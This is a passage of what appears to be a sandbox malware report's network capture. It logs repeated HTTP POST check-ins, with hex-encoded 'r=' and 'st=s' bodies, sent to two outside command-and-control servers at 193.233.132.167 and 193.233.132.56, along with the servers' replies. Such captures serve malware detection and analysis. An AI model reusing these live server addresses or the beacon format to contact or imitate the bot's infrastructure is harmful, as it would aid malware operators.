                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.665391922 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1255192.168.2.551109193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.756921053 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.001890898 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1256192.168.2.551110193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.011492968 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.260732889 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1257192.168.2.551111193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.250804901 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.499672890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1258192.168.2.551112193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.512886047 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.764080048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1259192.168.2.551113193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.847655058 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.091202974 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1260192.168.2.551114193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.107013941 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.355524063 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1261192.168.2.551115193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.345159054 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.596771002 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1262192.168.2.551116193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.609648943 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.869631052 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1263192.168.2.551117193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:46.944057941 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:47.187817097 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1264192.168.2.551118193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:47.211831093 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:47.458745956 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1265192.168.2.551119193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:47.437227011 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:47.685126066 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1266192.168.2.551120193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:47.715745926 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:47.966459036 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1267192.168.2.551121193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:48.036484957 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:48.279100895 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1268192.168.2.551122193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:48.311465979 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:48.559319973 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1269192.168.2.551123193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:48.533718109 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:48.789422035 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1270192.168.2.551124193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:48.817939043 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.074604988 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1271192.168.2.551125193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:49.152014017 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
